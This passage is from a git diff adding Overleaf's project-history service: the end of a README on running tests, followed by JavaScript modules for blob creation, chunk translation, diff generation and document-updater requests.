test_unit MOCHA_ARGS='--grep=AuthorizationManager' +``` + +Acceptance Tests +---------------- + +Acceptance tests are run against a live service, which runs in the `acceptance_test` container defined in `docker-compose.tests.yml`. + +To run the tests out-of-the-box, the makefile defines: + +``` +make install # Only needs running once, or when npm packages are updated +make test_acceptance +``` + +However, during development it is often useful to leave the service running for rapid iteration on the acceptance tests. This can be done with: + +``` +make test_acceptance_start_service +make test_acceptance_run # Run as many times as needed during development +make test_acceptance_stop_service +``` + +`make test_acceptance` just runs these three commands in sequence. + +During development it is often useful to only run a subset of tests, which can be configured with arguments to the mocha CLI: + +``` +make test_acceptance_run MOCHA_ARGS='--grep=AuthorizationManager' +``` + +Makefile and npm scripts +------------------------ + +The commands used to compile the app and tests, to run the mocha tests, and to run the app are all in `package.json`. These commands call out to `coffee`, `mocha`, etc which are available to `npm` in the local `node_modules/.bin` directory, using the local versions. Normally, these commands should not be run directly, but instead run in docker via make. + +The makefile contains a collection of shortcuts for running the npm scripts inside the appropriate docker containers, using the `docker-compose` files in the project. + +Copyright (c) Overleaf, 2017-2021. diff --git a/services/project-history/app.js b/services/project-history/app.js new file mode 100644 index 0000000..a72af4f --- /dev/null +++ b/services/project-history/app.js @@ -0,0 +1,28 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import { mongoClient } from './app/js/mongodb.js' +import { app } from './app/js/server.js' + +const host = Settings.internal.history.host +const port = Settings.internal.history.port + +mongoClient + .connect() + .then(() => { + app.listen(port, host, error => { + if (error) { + error = OError.tag(error, 'could not start history server') + logger.error({ error }, error.message) + } else { + logger.debug({}, `history starting up, listening on ${host}:${port}`) + } + }) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) diff --git a/services/project-history/app/js/BlobManager.js b/services/project-history/app/js/BlobManager.js new file mode 100644 index 0000000..8f62204 --- /dev/null +++ b/services/project-history/app/js/BlobManager.js @@ -0,0 +1,129 @@ +import _ from 'lodash' +import async from 'async' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as UpdateTranslator from './UpdateTranslator.js' + +// avoid creating too many blobs at the same time +const MAX_CONCURRENT_REQUESTS = 4 +// number of retry attempts for blob creation +const RETRY_ATTEMPTS = 3 +// delay between retries +const RETRY_INTERVAL = 100 + +export function createBlobsForUpdates( + projectId, + historyId, + updates, + extendLock, + callback +) { + // async.mapLimit runs jobs in parallel and returns on the first error. It + // doesn't wait for concurrent jobs to finish. We want to make sure all jobs + // are wrapped within our lock so we collect the first error enountered here + // and wait for all jobs to finish before returning the error. + let firstBlobCreationError = null + + function createBlobForUpdate(update, cb) { + // For file additions we need to first create a blob in the history-store + // with the contents of the file. Then we can create a change containing a + // file addition operation which references the blob. + // + // To do this we decorate file creation updates with a blobHash + if (!UpdateTranslator.isAddUpdate(update)) { + return async.setImmediate(() => cb(null, { update })) + } + + let attempts = 0 + // Since we may be creating O(1000) blobs in an update, allow for the + // occasional failure to prevent the whole update failing. + let lastErr + async.retry( + { + times: RETRY_ATTEMPTS, + interval: RETRY_INTERVAL, + }, + _cb => { + attempts++ + if (attempts > 1) { + logger.error( + { + err: lastErr, + projectId, + historyId, + update: _.pick( + update, + 'doc', + 'file', + 'hash', + 'createdBlob', + 'url' + ), + attempts, + }, + 'previous createBlob attempt failed, retrying' + ) + } + // extend the lock for each file because large files may take a long time + extendLock(err => { + if (err) { + lastErr = OError.tag(err) + return _cb(lastErr) + } + HistoryStoreManager.createBlobForUpdate( + projectId, + historyId, + update, + (err, hashes) => { + if (err) { + lastErr = OError.tag(err, 'retry: error creating blob', { + projectId, + doc: update.doc, + file: update.file, + }) + _cb(lastErr) + } else { + _cb(null, hashes) + } + } + ) + }) + }, + (error, blobHashes) => { + if (error) { + if (!firstBlobCreationError) { + firstBlobCreationError = error + } + return cb(null, { update, blobHashes }) + } + + extendLock(error => { + if (error) { + if (!firstBlobCreationError) { + firstBlobCreationError = error + } + } + cb(null, { update, blobHashes }) + }) + } + ) + } + + async.mapLimit( + updates, + MAX_CONCURRENT_REQUESTS, + createBlobForUpdate, + (unusedError, updatesWithBlobs) => { + // As indicated by the name this is unexpected, but changes in the future + // could cause it to be set and ignoring it would be unexpected + if (unusedError) { + return callback(unusedError) + } + if (firstBlobCreationError) { + return callback(firstBlobCreationError) + } + callback(null, updatesWithBlobs) + } + ) +} diff --git a/services/project-history/app/js/ChunkTranslator.js b/services/project-history/app/js/ChunkTranslator.js new file mode 100644 index 0000000..544db19 --- /dev/null +++ b/services/project-history/app/js/ChunkTranslator.js @@ -0,0 +1,626 @@ +import _ from 'lodash' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as Errors from './Errors.js' +import { + TextOperation, + InsertOp, + RemoveOp, + RetainOp, + Range, + TrackedChangeList, +} from 'overleaf-editor-core' + +/** + * @import { RawEditOperation, TrackedChangeRawData } from 'overleaf-editor-core/lib/types' + */ + +export function convertToSummarizedUpdates(chunk, callback) { + const version = chunk.chunk.startVersion + const { files } = chunk.chunk.history.snapshot + const builder = new UpdateSetBuilder(version, files) + + for (const change of chunk.chunk.history.changes) { + try { + builder.applyChange(change) + } catch (error1) { + const error = error1 + return callback(error) + } + } + callback(null, builder.summarizedUpdates) +} + +export function convertToDiffUpdates( + projectId, + chunk, + pathname, + fromVersion, + toVersion, + callback +) { + let error + let version = chunk.chunk.startVersion + const { files } = chunk.chunk.history.snapshot + const builder = new UpdateSetBuilder(version, files) + + let file = null + for (const change of chunk.chunk.history.changes) { + // Because we're referencing by pathname, which can change, we + // want to get the last file in the range fromVersion:toVersion + // that has the pathname we want. Note that this might not exist yet + // at fromVersion, so we'll just settle for the last existing one we find + // after that. + if (fromVersion <= version && version <= toVersion) { + const currentFile = builder.getFile(pathname) + if (currentFile) { + file = currentFile + } + } + + try { + builder.applyChange(change) + } catch (error1) { + error = error1 + return callback(error) + } + version += 1 + } + // Versions act as fence posts, with updates taking us from one to another, + // so we also need to check after the final update, when we're at the last version. + if (fromVersion <= version && version <= toVersion) { + const currentFile = builder.getFile(pathname) + if (currentFile) { + file = currentFile + } + } + + // return an empty diff if the file was flagged as missing with an explicit null + if (builder.getFile(pathname) === null) { + return callback(null, { initialContent: '', updates: [] }) + } + + if (file == null) { + error = new Errors.NotFoundError( + `pathname '${pathname}' not found in range` + ) + return callback(error) + } + + WebApiManager.getHistoryId(projectId, (err, historyId) => { + if (err) { + return callback(err) + } + file.getDiffUpdates(historyId, fromVersion, toVersion, callback) + }) +} + +class UpdateSetBuilder { + constructor(startVersion, files) { + this.version = startVersion + this.summarizedUpdates = [] + + this.files = Object.create(null) + for (const pathname in files) { + // initialize file from snapshot + const data = files[pathname] + this.files[pathname] = new File(pathname, data, startVersion) + } + } + + getFile(pathname) { + return this.files[pathname] + } + + applyChange(change) { + const timestamp = new Date(change.timestamp) + let authors = _.map(change.authors, id => { + if (id == null) { + return null + } + return id + }) + authors = authors.concat(change.v2Authors || []) + this.currentUpdate = { + meta: { + users: authors, + start_ts: timestamp.getTime(), + end_ts: timestamp.getTime(), + }, + v: this.version, + pathnames: new Set([]), + project_ops: [], + } + if (change.origin) { + this.currentUpdate.meta.origin = change.origin + } + + for (const op of change.operations) { + this.applyOperation(op, timestamp, authors, change.origin) + } + + this.currentUpdate.pathnames = Array.from(this.currentUpdate.pathnames) + this.summarizedUpdates.push(this.currentUpdate) + + this.version += 1 + } + + applyOperation(op, timestamp, authors, origin) { + if (UpdateSetBuilder._isTextOperation(op)) { + this.applyTextOperation(op, timestamp, authors, origin) + } else if (UpdateSetBuilder._isRenameOperation(op)) { + this.applyRenameOperation(op, timestamp, authors) + } else if (UpdateSetBuilder._isRemoveFileOperation(op)) { + this.applyRemoveFileOperation(op, timestamp, authors) + } else if (UpdateSetBuilder._isAddFileOperation(op)) { + this.applyAddFileOperation(op, timestamp, authors) + } + } + + applyTextOperation(operation, timestamp, authors, origin) { + const { pathname } = operation + if (pathname === '') { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'pathname is empty for text operation' + ) + return + } + + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'file is missing for text operation' + ) + this.files[pathname] = null // marker for a missing file + return + } + + file.applyTextOperation(authors, timestamp, this.version, operation, origin) + this.currentUpdate.pathnames.add(pathname) + } + + applyRenameOperation(operation, timestamp, authors) { + const { pathname, newPathname } = operation + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'file is missing for rename operation' + ) + this.files[pathname] = null // marker for a missing file + return + } + + file.rename(newPathname) + delete this.files[pathname] + this.files[newPathname] = file + + this.currentUpdate.project_ops.push({ + rename: { pathname, newPathname }, + }) + } + + applyAddFileOperation(operation, timestamp, authors) { + const { pathname } = operation + // add file + this.files[pathname] = new File(pathname, operation.file, this.version) + + this.currentUpdate.project_ops.push({ add: { pathname } }) + } + + applyRemoveFileOperation(operation, timestamp, authors) { + const { pathname } = operation + const file = this.files[pathname] + if (file == null) { + // this shouldn't happen, but we continue to allow the user to see the history + logger.warn( + { operation, timestamp, authors }, + 'pathname not found when removing file' + ) + this.files[pathname] = null // marker for a missing file + return + } + + delete this.files[pathname] + + this.currentUpdate.project_ops.push({ remove: { pathname } }) + } + + static _isTextOperation(op) { + return Object.prototype.hasOwnProperty.call(op, 'textOperation') + } + + static _isRenameOperation(op) { + return ( + Object.prototype.hasOwnProperty.call(op, 'newPathname') && + op.newPathname !== '' + ) + } + + static _isRemoveFileOperation(op) { + return ( + Object.prototype.hasOwnProperty.call(op, 'newPathname') && + op.newPathname === '' + ) + } + + static _isAddFileOperation(op) { + return Object.prototype.hasOwnProperty.call(op, 'file') + } +} + +/** + * @param {string} content + * @param {TrackedChangeList} trackedChanges + * @returns {string} + */ +function removeTrackedDeletesFromString(content, trackedChanges) { + let result = '' + let cursor = 0 + const trackedDeletes = trackedChanges + .asSorted() + .filter(tc => tc.tracking.type === 'delete') + for (const trackedChange of trackedDeletes) { + if (cursor < trackedChange.range.start) { + result += content.slice(cursor, trackedChange.range.start) + } + // skip the tracked change itself + cursor = trackedChange.range.end + } + result += content.slice(cursor) + return result +} + +class File { + constructor(pathname, snapshot, initialVersion) { + this.pathname = pathname + this.snapshot = snapshot + this.initialVersion = initialVersion + this.operations = [] + } + + applyTextOperation(authors, timestamp, version, operation, origin) { + this.operations.push({ authors, timestamp, version, operation, origin }) + } + + rename(pathname) { + this.pathname = pathname + } + + getDiffUpdates(historyId, fromVersion, toVersion, callback) { + if (this.snapshot.stringLength == null) { + // Binary file + return callback(null, { binary: true }) + } + this._loadContentAndRanges(historyId, (error, content, ranges) => { + if (error != null) { + return callback(OError.tag(error)) + } + const trackedChanges = TrackedChangeList.fromRaw( + ranges?.trackedChanges || [] + ) + /** @type {string | undefined} */ + let initialContent + const updates = [] + + for (const operationInfo of this.operations) { + if (!('textOperation' in operationInfo.operation)) { + // We only care about text operations + continue + } + const { authors, timestamp, version, operation } = operationInfo + // Set the initialContent to the latest version we have before the diff + // begins. 'version' here refers to the document version as we are + // applying the updates. So we store the content *before* applying the + // updates. + if (version >= fromVersion && initialContent === undefined) { + initialContent = removeTrackedDeletesFromString( + content, + trackedChanges + ) + } + + let ops + ;({ content, ops } = this._convertTextOperation( + content, + operation, + trackedChanges + )) + + // We only need to return the updates between fromVersion and toVersion + if (fromVersion <= version && version < toVersion) { + const update = { + meta: { + users: authors, + start_ts: timestamp.getTime(), + end_ts: timestamp.getTime(), + }, + v: version, + op: ops, + } + if (operationInfo.origin) { + update.meta.origin = operationInfo.origin + } + updates.push(update) + } + } + + if (initialContent === undefined) { + initialContent = removeTrackedDeletesFromString(content, trackedChanges) + } + callback(null, { initialContent, updates }) + }) + } + + /** + * + * @param {string} initialContent + * @param {RawEditOperation} operation + * @param {TrackedChangeList} trackedChanges + */ + _convertTextOperation(initialContent, operation, trackedChanges) { + const textOp = TextOperation.fromJSON(operation) + const textUpdateBuilder = new TextUpdateBuilder( + initialContent, + trackedChanges + ) + for (const op of textOp.ops) { + textUpdateBuilder.applyOp(op) + } + textUpdateBuilder.finish() + return { + content: textUpdateBuilder.result, + ops: textUpdateBuilder.changes, + } + } + + _loadContentAndRanges(historyId, callback) { + HistoryStoreManager.getProjectBlob( + historyId, + this.snapshot.hash, + (err, content) => { + if (err) { + return callback(err) + } + if (this.snapshot.rangesHash) { + HistoryStoreManager.getProjectBlob( + historyId, + this.snapshot.rangesHash, + (err, ranges) => { + if (err) { + return callback(err) + } + return callback(null, content, JSON.parse(ranges)) + } + ) + } else { + return callback(null, content, undefined) + } + } + ) + } +} + +class TextUpdateBuilder { + /** + * + * @param {string} source + * @param {TrackedChangeList} ranges + */ + constructor(source, ranges) { + this.trackedChanges = ranges + this.source = source + this.sourceCursor = 0 + this.result = '' + /** @type {({i: string, p: number} | {d: string, p: number})[]} */ + this.changes = [] + } + + applyOp(op) { + if (op instanceof RetainOp) { + const length = this.result.length + this.applyRetain(op) + this.trackedChanges.applyRetain(length, op.length, { + tracking: op.tracking, + }) + } + + if (op instanceof InsertOp) { + const length = this.result.length + this.applyInsert(op) + this.trackedChanges.applyInsert(length, op.insertion, { + tracking: op.tracking, + }) + } + + if (op instanceof RemoveOp) { + const length = this.result.length + this.applyDelete(op) + this.trackedChanges.applyDelete(length, op.length) + } + } + + /** + * + * @param {RetainOp} retain + */ + applyRetain(retain) { + const resultRetentionRange = new Range(this.result.length, retain.length) + const sourceRetentionRange = new Range(this.sourceCursor, retain.length) + + let scanCursor = this.result.length + if (retain.tracking) { + // We are modifying existing tracked deletes. We need to treat removal + // (type insert/none) of a tracked delete as an insertion. Similarly, any + // range we introduce as a tracked deletion must be reported as a deletion. + const trackedDeletes = this.trackedChanges + .asSorted() + .filter( + tc => + tc.tracking.type === 'delete' && + tc.range.overlaps(resultRetentionRange) + ) + + const sourceOffset = this.sourceCursor - this.result.length + for (const trackedDelete of trackedDeletes) { + const resultTrackedDelete = trackedDelete.range + const sourceTrackedDelete = trackedDelete.range.moveBy(sourceOffset) + + if (scanCursor < resultTrackedDelete.start) { + if (retain.tracking.type === 'delete') { + this.changes.push({ + d: this.source.slice( + this.sourceCursor, + sourceTrackedDelete.start + ), + p: this.result.length, + }) + } + this.result += this.source.slice( + this.sourceCursor, + sourceTrackedDelete.start + ) + scanCursor = resultTrackedDelete.start + this.sourceCursor = sourceTrackedDelete.start + } + const endOfInsertionResult = Math.min( + resultTrackedDelete.end, + resultRetentionRange.end + ) + const endOfInsertionSource = Math.min( + sourceTrackedDelete.end, + sourceRetentionRange.end + ) + const text = this.source.slice(this.sourceCursor, endOfInsertionSource) + if ( + retain.tracking.type === 'none' || + retain.tracking.type === 'insert' + ) { + this.changes.push({ + i: text, + p: this.result.length, + }) + } + this.result += text + // skip the tracked delete itself + scanCursor = endOfInsertionResult + this.sourceCursor = endOfInsertionSource + + if (scanCursor >= resultRetentionRange.end) { + break + } + } + } + if (scanCursor < resultRetentionRange.end) { + // The last region is not a tracked delete. But we should still handle + // a new tracked delete as a deletion. + const text = this.source.slice( + this.sourceCursor, + sourceRetentionRange.end + ) + if (retain.tracking?.type === 'delete') { + this.changes.push({ + d: text, + p: this.result.length, + }) + } + this.result += text + } + this.sourceCursor = sourceRetentionRange.end + } + + /** + * + * @param {InsertOp} insert + */ + applyInsert(insert) { + if (insert.tracking?.type !== 'delete') { + // Skip tracked deletions + this.changes.push({ + i: insert.insertion, + p: this.result.length, + }) + } + this.result += insert.insertion + // The source cursor doesn't advance + } + + /** + * + * @param {RemoveOp} deletion + */ + applyDelete(deletion) { + const sourceDeletionRange = new Range(this.sourceCursor, deletion.length) + const resultDeletionRange = new Range(this.result.length, deletion.length) + + const trackedDeletes = this.trackedChanges + .asSorted() + .filter( + tc => + tc.tracking.type === 'delete' && + tc.range.overlaps(resultDeletionRange) + ) + .sort((a, b) => a.range.start - b.range.start) + + let scanCursor = this.result.length + const sourceOffset = this.sourceCursor - this.result.length + + for (const trackedDelete of trackedDeletes) { + const resultTrackDeleteRange = trackedDelete.range + const sourceTrackDeleteRange = trackedDelete.range.moveBy(sourceOffset) + + if (scanCursor < resultTrackDeleteRange.start) { + this.changes.push({ + d: this.source.slice(this.sourceCursor, sourceTrackDeleteRange.start), + p: this.result.length, + }) + } + // skip the tracked delete itself + scanCursor = Math.min(resultTrackDeleteRange.end, resultDeletionRange.end) + this.sourceCursor = Math.min( + sourceTrackDeleteRange.end, + sourceDeletionRange.end + ) + + if (scanCursor >= resultDeletionRange.end) { + break + } + } + if (scanCursor < resultDeletionRange.end) { + this.changes.push({ + d: this.source.slice(this.sourceCursor, sourceDeletionRange.end), + p: this.result.length, + }) + } + this.sourceCursor = sourceDeletionRange.end + } + + finish() { + if (this.sourceCursor < this.source.length) { + this.result += this.source.slice(this.sourceCursor) + } + for (const op of this.changes) { + if ('p' in op && typeof op.p === 'number') { + // Maybe we have to move the position of the deletion to account for + // tracked changes that we're hiding in the UI. + op.p -= this.trackedChanges + .asSorted() + .filter(tc => tc.tracking.type === 'delete' && tc.range.start < op.p) + .map(tc => { + if (tc.range.end < op.p) { + return tc.range.length + } + return op.p - tc.range.start + }) + .reduce((a, b) => a + b, 0) + } + } + } +} diff --git a/services/project-history/app/js/DiffGenerator.js b/services/project-history/app/js/DiffGenerator.js new file mode 100644 index 0000000..57e8d5a --- /dev/null +++ b/services/project-history/app/js/DiffGenerator.js @@ -0,0 +1,274 @@ +import _ from 'lodash' +import OError from '@overleaf/o-error' + +export class ConsistencyError extends OError {} + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +export function buildDiff(initialContent, updates) { + let diff = [{ u: initialContent }] + for (const update of updates) { + diff = applyUpdateToDiff(diff, update) + } + diff = compressDiff(diff) + return diff +} + +_mocks.compressDiff = diff => { + const newDiff = [] + for (const part of diff) { + const users = part.meta?.users ?? [] + + if (part.meta?.origin?.kind === 'history-resync') { + // Skip history resync updates. Inserts are converted to unchanged text + // and deletes are skipped, so that they effectively don't appear in the + // diff. + if (part.u != null) { + newDiff.push(part) + } else if (part.i != null) { + newDiff.push({ u: part.i }) + } + continue + } + + if (newDiff.length === 0) { + // If we haven't seen other parts yet, we have nothing to merge. + newDiff.push(part) + continue + } + + const lastPart = newDiff[newDiff.length - 1] + const lastUsers = lastPart.meta?.users ?? [] + const usersNotInBothParts = _.xor(users, lastUsers) + + if (usersNotInBothParts.length > 0) { + // If the set of users in the last part and this part are not the same, we + // can't merge. + newDiff.push(part) + continue + } + + if (lastPart.i != null && part.i != null) { + // Merge two inserts + lastPart.i += part.i + lastPart.meta.start_ts = Math.min( + lastPart.meta.start_ts, + part.meta.start_ts + ) + lastPart.meta.end_ts = Math.max(lastPart.meta.end_ts, part.meta.end_ts) + } else if (lastPart.d != null && part.d != null) { + // Merge two deletes + lastPart.d += part.d + lastPart.meta.start_ts = Math.min( + lastPart.meta.start_ts, + part.meta.start_ts + ) + lastPart.meta.end_ts = Math.max(lastPart.meta.end_ts, part.meta.end_ts) + } else { + newDiff.push(part) + } + } + return newDiff +} + +export function compressDiff(...args) { + return _mocks.compressDiff(...args) +} + +export function applyOpToDiff(diff, op, meta) { + let consumedDiff + + let remainingDiff = diff.slice() + ;({ consumedDiff, remainingDiff } = _consumeToOffset(remainingDiff, op.p)) + const newDiff = consumedDiff + + if (op.i != null) { + newDiff.push({ + i: op.i, + meta, + }) + } else if (op.d != null) { + ;({ consumedDiff, remainingDiff } = _consumeDiffAffectedByDeleteOp( + remainingDiff, + op, + meta + )) + newDiff.push(...(consumedDiff || [])) + } + + newDiff.push(...(remainingDiff || [])) + + return newDiff +} + +_mocks.applyUpdateToDiff = (diff, update) => { + for (const op of update.op) { + if (op.broken !== true) { + diff = applyOpToDiff(diff, op, update.meta) + } + } + return diff +} + +export function applyUpdateToDiff(...args) { + return _mocks.applyUpdateToDiff(...args) +} + +function _consumeToOffset(remainingDiff, totalOffset) { + let part + const consumedDiff = [] + let position = 0 + while ((part = remainingDiff.shift())) { + const length = _getLengthOfDiffPart(part) + if (part.d != null) { + consumedDiff.push(part) + } else if (position + length >= totalOffset) { + const partOffset = totalOffset - position + if (partOffset > 0) { + consumedDiff.push(_slicePart(part, 0, partOffset)) + } + if (partOffset < length) { + remainingDiff.unshift(_slicePart(part, partOffset)) + } + break + } else { + position += length + consumedDiff.push(part) + } + } + + return { + consumedDiff, + remainingDiff, + } +} + +function _consumeDiffAffectedByDeleteOp(remainingDiff, deleteOp, meta) { + const consumedDiff = [] + let remainingOp = deleteOp + while (remainingOp && remainingDiff.length > 0) { + let newPart + ;({ newPart, remainingDiff, remainingOp } = _consumeDeletedPart( + remainingDiff, + remainingOp, + meta + )) + if (newPart != null) { + consumedDiff.push(newPart) + } + } + return { + consumedDiff, + remainingDiff, + } +} + +function _consumeDeletedPart(remainingDiff, op, meta) { + let deletedContent, newPart, remainingOp + const part = remainingDiff.shift() + const partLength = _getLengthOfDiffPart(part) + + if (part.d != null) { + // Skip existing deletes + remainingOp = op + newPart = part + } else if (partLength > op.d.length) { + // Only the first bit of the part has been deleted + const remainingPart = _slicePart(part, op.d.length) + remainingDiff.unshift(remainingPart) + + deletedContent = _getContentOfPart(part).slice(0, op.d.length) + if (deletedContent !== op.d) { + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${op.d}'` + ) + } + + if (part.u != null) { + newPart = { + d: op.d, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = null + } else if (partLength === op.d.length) { + // The entire part has been deleted, but it is the last part + + deletedContent = _getContentOfPart(part) + if (deletedContent !== op.d) { + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${op.d}'` + ) + } + + if (part.u != null) { + newPart = { + d: op.d, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = null + } else if (partLength < op.d.length) { + // The entire part has been deleted and there is more + + deletedContent = _getContentOfPart(part) + const opContent = op.d.slice(0, deletedContent.length) + if (deletedContent !== opContent) { + throw new ConsistencyError( + `deleted content, '${deletedContent}', does not match delete op, '${opContent}'` + ) + } + + if (part.u) { + newPart = { + d: part.u, + meta, + } + } else if (part.i != null) { + newPart = null + } + + remainingOp = { + p: op.p, + d: op.d.slice(_getLengthOfDiffPart(part)), + } + } + + return { + newPart, + remainingDiff, + remainingOp, + } +} + +function _slicePart(basePart, from, to) { + let part + if (basePart.u != null) { + part = { u: basePart.u.slice(from, to) } + } else if (basePart.i != null) { + part = { i: basePart.i.slice(from, to) } + } + if (basePart.meta != null) { + part.meta = basePart.meta + } + return part +} + +function _getLengthOfDiffPart(part) { + return (part.u || part.d || part.i || '').length +} + +function _getContentOfPart(part) { + return part.u || part.d || part.i || '' +} diff --git a/services/project-history/app/js/DiffManager.js b/services/project-history/app/js/DiffManager.js new file mode 100644 index 0000000..69c9b2f --- /dev/null +++ b/services/project-history/app/js/DiffManager.js @@ -0,0 +1,240 @@ +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import async from 'async' +import * as DiffGenerator from './DiffGenerator.js' +import * as FileTreeDiffGenerator from './FileTreeDiffGenerator.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as ChunkTranslator from './ChunkTranslator.js' +import * as Errors from './Errors.js' + +let MAX_CHUNK_REQUESTS = 10 + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +export function getDiff(projectId, pathname, fromVersion, toVersion, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error) { + return callback(OError.tag(error)) + } + _getProjectUpdatesBetweenVersions( + projectId, + pathname, + fromVersion, + toVersion, + (error, result) => { + if (error) { + return callback(OError.tag(error)) + } + const { binary, initialContent, updates } = result + let diff + if (binary) { + diff = { binary: true } + } else { + try { + diff = DiffGenerator.buildDiff(initialContent, updates) + } catch (err) { + return callback( + OError.tag(err, 'failed to build diff', { + projectId, + pathname, + fromVersion, + toVersion, + }) + ) + } + } + callback(null, diff) + } + ) + }) +} + +export function getFileTreeDiff(projectId, fromVersion, toVersion, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error) { + return callback(OError.tag(error)) + } + _getChunksAsSingleChunk( + projectId, + fromVersion, + toVersion, + (error, chunk) => { + let diff + if (error) { + return callback(OError.tag(error)) + } + try { + diff = FileTreeDiffGenerator.buildDiff(chunk, fromVersion, toVersion) + } catch (error1) { + error = error1 + if (error instanceof Errors.InconsistentChunkError) { + return callback(error) + } else { + throw OError.tag(error) + } + } + callback(null, diff) + } + ) + }) +} + +export function _getChunksAsSingleChunk( + projectId, + fromVersion, + toVersion, + callback +) { + logger.debug( + { projectId, fromVersion, toVersion }, + '[_getChunksAsSingleChunk] getting chunks' + ) + _getChunks(projectId, fromVersion, toVersion, (error, chunks) => { + if (error) { + return callback(OError.tag(error)) + } + logger.debug( + { projectId, fromVersion, toVersion, chunks }, + '[_getChunksAsSingleChunk] got chunks' + ) + const chunk = _concatChunks(chunks) + callback(null, chunk) + }) +} + +_mocks._getProjectUpdatesBetweenVersions = ( + projectId, + pathname, + fromVersion, + toVersion, + callback +) => { + _getChunksAsSingleChunk(projectId, fromVersion, toVersion, (error, chunk) => { + if (error) { + return callback(OError.tag(error)) + } + logger.debug( + { projectId, pathname, fromVersion, toVersion, chunk }, + '[_getProjectUpdatesBetweenVersions] concatted chunk' + ) + ChunkTranslator.convertToDiffUpdates( + projectId, + chunk, + pathname, + fromVersion, + toVersion, + callback + ) + }) +} + +export function _getProjectUpdatesBetweenVersions(...args) { + _mocks._getProjectUpdatesBetweenVersions(...args) +} + +_mocks._getChunks = (projectId, fromVersion, toVersion, callback) => { + let chunksRequested = 0 + let lastChunkStartVersion = toVersion + const chunks = [] + + function shouldRequestAnotherChunk(cb) { + const stillUnderChunkLimit = chunksRequested < MAX_CHUNK_REQUESTS + const stillNeedVersions = fromVersion < lastChunkStartVersion + const stillSaneStartVersion = lastChunkStartVersion > 0 + logger.debug( + { + projectId, + stillUnderChunkLimit, + stillNeedVersions, + stillSaneStartVersion, + fromVersion, + lastChunkStartVersion, + chunksRequested, + }, + '[_getChunks.shouldRequestAnotherChunk]' + ) + return cb( + null, + stillUnderChunkLimit && stillNeedVersions && stillSaneStartVersion + ) + } + + function getNextChunk(cb) { + logger.debug( + { + projectId, + lastChunkStartVersion, + }, + '[_getChunks.getNextChunk]' + ) + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) { + return cb(OError.tag(error)) + } + HistoryStoreManager.getChunkAtVersion( + projectId, + historyId, + lastChunkStartVersion, + (error, chunk) => { + if (error) { + return cb(OError.tag(error)) + } + lastChunkStartVersion = chunk.chunk.startVersion + chunksRequested += 1 + chunks.push(chunk) + cb() + } + ) + }) + } + + getNextChunk(error => { + if (error) { + return callback(OError.tag(error)) + } + async.whilst(shouldRequestAnotherChunk, getNextChunk, error => { + if (error) { + return callback(error) + } + if (chunksRequested >= MAX_CHUNK_REQUESTS) { + error = new Errors.BadRequestError('Diff spans too many chunks') + callback(error) + } else { + callback(null, chunks) + } + }) + }) +} + +export function _getChunks(...args) { + _mocks._getChunks(...args) +} + +_mocks._concatChunks = chunks => { + chunks.reverse() + const chunk = chunks[0] + // We will append all of the changes from the later + // chunks onto the first one, to form one 'big' chunk. + for (const nextChunk of chunks.slice(1)) { + chunk.chunk.history.changes = chunk.chunk.history.changes.concat( + nextChunk.chunk.history.changes + ) + } + return chunk +} + +function _concatChunks(...args) { + return _mocks._concatChunks(...args) +} + +// for tests +export function setMaxChunkRequests(value) { + MAX_CHUNK_REQUESTS = value +} diff --git a/services/project-history/app/js/DocumentUpdaterManager.js b/services/project-history/app/js/DocumentUpdaterManager.js new file mode 100644 index 0000000..d591c2d --- /dev/null +++ b/services/project-history/app/js/DocumentUpdaterManager.js @@ -0,0 +1,80 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import request from 'request' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' + +export function getDocument(projectId, docId, callback) { + if (callback == null) { + callback = function () {} + } + const url = `${Settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}` + logger.debug({ projectId, docId }, 'getting doc from document updater') + return request.get(url, function (error, res, body) { + if (error != null) { + return callback(OError.tag(error)) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + try { + body = JSON.parse(body) + } catch (error1) { + error = error1 + return callback(error) + } + logger.debug( + { projectId, docId, version: body.version }, + 'got doc from document updater' + ) + return callback(null, body.lines.join('\n'), body.version) + } else { + error = new OError( + `doc updater returned a non-success status code: ${res.statusCode}`, + { project_id: projectId, doc_id: docId, url } + ) + return callback(error) + } + }) +} + +export function setDocument(projectId, docId, content, userId, callback) { + if (callback == null) { + callback = function () {} + } + const url = `${Settings.apis.documentupdater.url}/project/${projectId}/doc/${docId}` + logger.debug({ projectId, docId }, 'setting doc in document updater') + return request.post( + { + url, + json: { + lines: 